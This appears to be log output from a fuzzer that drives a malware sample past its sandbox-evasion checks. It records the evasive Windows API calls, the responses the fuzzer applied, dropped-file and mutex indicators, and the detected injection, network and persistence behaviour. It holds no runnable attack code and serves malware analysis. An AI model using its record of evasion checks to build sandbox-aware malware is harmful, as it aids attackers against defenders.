	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [2190] HASH [78933F52]
[*] Run terminated at KUserTickCount: 47683
 |  
[CONFIG] Score: 2190020 - ID: 16 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 2 - Born in run: 17 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 0 0
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 3 0
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 2 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 16
 ↪   Process32Next 40654 11A9ECE 4 16
 ↪   GetModuleFileNameA 33334 11A8236 1 6

[*] P2-iteration: 18 - Start-KUserTickCount: 47683
 |  GetModuleFileNameA - 98097 - 11B7F31 - 1 - 6
 |  CPUID - 79119 - 11B350F - 0 - 0
 |  CreateFileW - 126357 - 11BED95 - 2 - 0
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 3 - 0
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 17
 |  Process32Next - 40654 - 11A9ECE - 4 - 17
 |  GetModuleFileNameA - 33334 - 11A8236 - 1 - 1
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => SUCCEED (SUPPRESSED)
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => RETARGET
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [2788] HASH [639BA714]
[*] Run terminated at KUserTickCount: 51298
 |  
[CONFIG] Score: 2788030 - ID: 17 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 2 - Born in run: 18 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 1 6
 ↪   CPUID 79119 11B350F 0 0
 ↪   CreateFileW 126357 11BED95 2 0
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 3 0
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 17
 ↪   Process32Next 40654 11A9ECE 4 17
 ↪   GetModuleFileNameA 33334 11A8236 1 1

[*] P2-iteration: 19 - Start-KUserTickCount: 51298
 |  GetModuleFileNameA - 98097 - 11B7F31 - 0 - 0
 |  CPUID - 79119 - 11B350F - 1 - 0
 |  CreateFileW - 126357 - 11BED95 - 1 - 6
 |  TimeQueryAPIs - 57177 - 11ADF59 - 7 - 0
 |  CreateMutexA - 35811 - 11A8BE3 - 1 - 35
 |  Process32First - 40419 - 11A9DE3 - 0 - 0
 |  Process32Next - 40442 - 11A9DFA - 4 - 18
 |  Process32Next - 40654 - 11A9ECE - 4 - 18
 |  GetModuleFileNameA - 33334 - 11A8236 - 0 - 0
[*] Now Fuzzing Api: GetModuleFileNameA @ 11B7F31 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 40000000 - CreationDisposition: 2
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: WriteFile @ 11B4B8C
 ~>  Writing to file: \\?\C:\ProgramData\VMWareUser.exe
[*] New IoC Api: WriteFile @ 11B4B8C => SUPPRESSED
 ~>  Writing to file: \\?\C:\ProgramData\VMWareUser.exe
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateMutexA @ 11A8BE3 => RETARGET
[*] New IoC Api: CreateThread @ 11AD9A5
[*] Now Fuzzing Api: Process32First @ 11A9DE3 => NOTHING
[*] Now Fuzzing Api: Process32Next @ 11A9DFA => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET
[*] Now Fuzzing Api: Process32Next @ 11A9ECE => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET
[*] New Evasive API: GetCursorPos @ 11A8769 => FAIL
[*] Now Fuzzing Api: GetModuleFileNameA @ 11A8236 => NOTHING
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\Users\student\Desktop\Sandbox\1c8aaf0db310895a76eba04771d573993d76411539f8ec8d2a194820210d53b4.exe - DesiredAccess: 80000000 - CreationDisposition: 3
[*] Now Fuzzing Api: CreateFileW @ 11BED95 => RETARGET (SUPPRESSED)
[*] New IoC Api: CreateProcessA @ 11A82CC
 ~>  Process name: (null) - Command line: C:\WinDDK\WinDDK.exe - Creation flag: 0
[*] New Evasive API: FindFirstFileA @ 11A9BB1 => SUCCEED
[*] New IoC Api: CreateFileW @ 11BED95
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
[*] New IoC Api: CreateFileW @ 11BED95 => SUPPRESSED
 ~>  File name: C:\WinDDK\tmp-0.bin - DesiredAccess: 80000000 - CreationDisposition: 3
	IoC APIs: CreateFileW @ 11BED95
	IoC APIs: WriteFile @ 11B4B8C
	IoC APIs: CreateThread @ 11AD9A5
	IoC APIs: CreateProcessA @ 11A82CC
[-] NZB [3062] HASH [3EF7324E]
[*] Run terminated at KUserTickCount: 54904
 |  
[CONFIG] Score: 3062060 - ID: 18 - Parent ID: 0 - Num API: 9 - Num post-evasive API: 4 - Born in run: 19 - Epoch: 1, Fuzzed in epoch: 0
 ↪   GetModuleFileNameA 98097 11B7F31 0 0
 ↪   CPUID 79119 11B350F 1 0
 ↪   CreateFileW 126357 11BED95 1 6
 ↪   TimeQueryAPIs 57177 11ADF59 7 0
 ↪   CreateMutexA 35811 11A8BE3 1 35
 ↪   Process32First 40419 11A9DE3 0 0
 ↪   Process32Next 40442 11A9DFA 4 18
 ↪   Process32Next 40654 11A9ECE 4 18
 ↪   GetModuleFileNameA 33334 11A8236 0 0

-------------------------+---------------------------------------------------+-------------------------
-------------------------|                 Execution Metrics                 |-------------------------
-------------------------+---------------------------------------------------+-------------------------
-------------------------| Total Execution Time _______________ 10m and 53s  |-------------------------
-------------------------| Average Execution Time _____________ 36s ________ |-------------------------
-------------------------| Number of Runs _____________________ 19 _________ |-------------------------
-------------------------| N. Configs Generated _______________ 18 _________ |-------------------------
-------------------------| N. Epochs __________________________ 1 __________ |-------------------------
-------------------------+---------------------------------------------------+-------------------------
-------------------------| Initial Configuration |-| Best Configuration (05) |-------------------------
-------------------------+---------------------------------------------------+-------------------------
Checksum ________________ : 74D9F7E4 _____________________________ : 1D174079 _________________________
Evasive APIs Count ______ : 9 ____________________________________ : 9 ________________________________
Post-evasive APIs Count _ : 3 ____________________________________ : 4 ________________________________
Score ___________________ : 2916120 ______________________________ : 3178060 __________________________
NZB _____________________ : 2916 _________________________________ : 3178 _____________________________
Born in run ______________________________________________________ : 6 ________________________________
Born in epoch ____________________________________________________ : 1 ________________________________
Execution Time ___________________________________________________ : 56398ms __________________________
Fuzzed in epoch __________________________________________________ : 0 ________________________________
--------------------------------------+-------------------------+--------------------------------------
--------------------------------------| Best config's testcases |--------------------------------------
--------------------------------------+-------------------------+--------------------------------------
GetModuleFileNameA @ 0x11B7F31 ___________________________________ : RETARGET _________________________
|____________________________________________ C:\Users\student\AppData\Roaming\Microsoft\Protect\SETUP\
CPUID @ 0x11B350F ________________________________________________ : RETARGET _________________________
|_____________________________________________________________________________________________ no-value
CreateFileW @ 0x11BED95 __________________________________________ : RETARGET _________________________
|___________________________________________________________________________________________ Backup.txt
TimeQueryAPIs @ 0x11ADF59 ________________________________________ : ADJUST ___________________________
CreateMutexA @ 0x11A8BE3 _________________________________________ : RETARGET _________________________
|_______________________________________________________________________________ ZonesCacheCounterMutex
Process32First @ 0x11A9DE3 _______________________________________ : NOTHING __________________________
Process32Next @ 0x11A9DFA ________________________________________ : MAPPINGS, ID: 5 __________________
Process32Next @ 0x11A9ECE ________________________________________ : MAPPINGS, ID: 5 __________________
GetModuleFileNameA @ 0x11A8236 ___________________________________ : NOTHING __________________________
-----------------------------------------+-------------------+-----------------------------------------
-----------------------------------------| Post-Evasive APIs |-----------------------------------------
-----------+--------------------+--------+-------------------+--------+--------------------+-----------
-----------| Init Configuration |-------------------------------------| Best Configuration |-----------
-----------+--------------------+-------------------------------------+--------------------+-----------
|__________ CreateFileW @ 0x11BED95 _______________________________ CreateFileW @ 0x11BED95 __________|
|__________ WriteFile @ 0x11B4B8C ________________________________ CreateThread @ 0x11AD9A5 __________|
|__________ CreateProcessA @ 0x11A82CC ______________________________ WriteFile @ 0x11B4B8C __________|
|_______________________________________________________________ CreateProcessA @ 0x11A82CC __________|
----------------------------------------+---------------------+----------------------------------------
----------------------------------------| Detected activities |----------------------------------------
----------------------------------------+---------------------+----------------------------------------
| [ INJECTION ] CreateProcessA CreateThread _________________________________________________________ |
| [ SERVICE ] No Activity Detected __________________________________________________________________ |
| [ INTERNET ] socket connect send __________________________________________________________________ |
| [ PERSISTENCY ] WriteFile _________________________________________________________________________ |
| [ CRYPTO ] No Activity Detected ___________________________________________________________________ |
| [ SPYING ] No Activity Detected ___________________________________________________________________ |
| [ HELPER ] No Activity Detected ___________________________________________________________________ |
-------------------------------------------------------------------------------------------------------
